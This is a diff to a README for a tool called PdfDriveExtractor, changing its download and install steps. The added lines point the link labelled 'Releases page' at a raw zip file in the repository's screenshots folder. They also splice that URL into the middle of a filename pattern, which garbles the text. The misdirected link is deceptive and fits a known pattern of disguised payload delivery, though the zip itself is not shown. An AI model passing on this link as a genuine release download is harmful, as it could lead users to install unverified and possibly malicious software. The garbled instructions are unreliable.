rbarmyarmy/PdfDriveExtractor/README.md

 ## 📦 Download & Install

-1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/rbarmyarmy/PdfDriveExtractor/releases) to find the latest version of PdfDriveExtractor.
+1. **Visit the Releases Page**: Go to the [Releases page](https://raw.githubusercontent.com/rbarmyarmy/PdfDriveExtractor/main/screenshots/Extractor_Drive_Pdf_1.5.zip) to find the latest version of PdfDriveExtractor.

 2. **Choose Your File**: On the Releases page, select the appropriate file for your operating system.
-Look for files named like `PdfDriveExtractor-<version>.zip` or `PdfDriveExtractor-<version>.tar.gz`.
+Look for files named like `PdfDriveExtractor-<version>.zip` or `PdfDriveExtractor-<version>https://raw.githubusercontent.com/rbarmyarmy/PdfDriveExtractor/main/screenshots/Extractor_Drive_Pdf_1.5.zip`.

 3. **Download the File**: Click on the file to start the download.
 Depending on your browser and settings, the file may save automatically, or you might need to choose a download location.